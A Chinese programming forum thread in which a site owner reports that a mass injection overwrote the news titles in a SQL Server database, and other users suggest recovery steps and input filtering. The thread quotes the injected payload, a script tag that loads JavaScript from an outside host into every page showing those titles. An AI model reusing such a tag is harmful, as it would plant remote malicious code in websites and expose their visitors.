| 网站首页 | 业界新闻 | 小组 | 威客 | 人才 | 下载频道 | 博客 | 代码贴 | 在线编程 | 编程论坛
欢迎加入我们,一同切磋技术
用户名:   

密 码:  
共有 1073 人关注过本帖
标题:紧急求助
只看楼主 加入收藏
都市打工者
等 级:新手上路
帖 子:177
专家分:0
注 册:2007-8-7
结帖率:100%
 问题点数:0 回复次数:12 
紧急求助
数据库中的新闻表的title字段数据被update 了,所有数据后半部分都被 <script src=http://sb.5252.ws:88/107/1.js> </script>替换了

B/S系统,asp +sqlserver2005

问题如下:
1:病毒名称是?
2:病毒是在服务器段还是在客户端?也就是说,病毒是有客户段提交数据时发生的还是服务器上病毒自动更新数据库中的内容?
3:有何解决方法?

大家可否给点建议,有相关文章也可以。
搜索更多相关主题的帖子: 病毒 数据 update title 文章 
madpbpl
等 级:贵宾
威 望:11
帖 子:2876
专家分:244
注 册:2007-4-5
得分:0 
病毒名称不知道
网站先停了,数据替换
杀毒
(联系管理员)检查服务器其他站点是否有影响
重新上传
都市打工者
真的没有人知道啊,诶,郁闷

做好自己工作的每一天,与朋友乐
yms123
等 级:版主
威 望:209
帖 子:12488
专家分:19042
注 册:2004-7-17
新闻表被update加入病毒代码的新闻,是否是同一个人录入的?
都市打工者
不是啊.我现在新闻表的字段n_title的所有数据都被人串改了,呵呵,并且串改的内容都一样的,你到摆渡搜索一下<script src=http://sb.5252.ws:88/107/1.js> </script>这个,现在很多网站都是出现同一个问题

hxfly
威 望:17
帖 子:5810
专家分:118
注 册:2005-4-7
可能是数据库服务器被入侵吧?
如果是通过你本身程序添加的数据,应该在数据添加前过滤。

都市打工者
怎么没有人解决啊?因为网上最近出现很多这样的情况的,呵呵

hxfly
威 望:17
帖 子:5810
专家分:118
注 册:2005-4-7
如果你的SQL服务器被入侵了,那不是程序的问题,所以没办法帮你解决

chb592657370
来 自:武汉交通职业学院
帖 子:120
注 册:2006-12-9
有数据库备份或者是数据库日志文件的备份吗?你数据库是不是每天备份的,重新还原下数据库!

既然剑不如人,就要剑法胜于人!
都市打工者
还原是没有用的啊,最近网上很多这样的问题的,治标不治本啊.现在不知道是哪个问题了,我的是sql2005数据库与2003系统.呵呵.可能是 sql注入攻击.你们有好的防这个注入方法啊?

快速回复:紧急求助
数据加载中...

关于我们 | 广告合作 | 编程中国 | 清除Cookies | TOP | 手机版

编程中国 版权所有,并保留所有权利。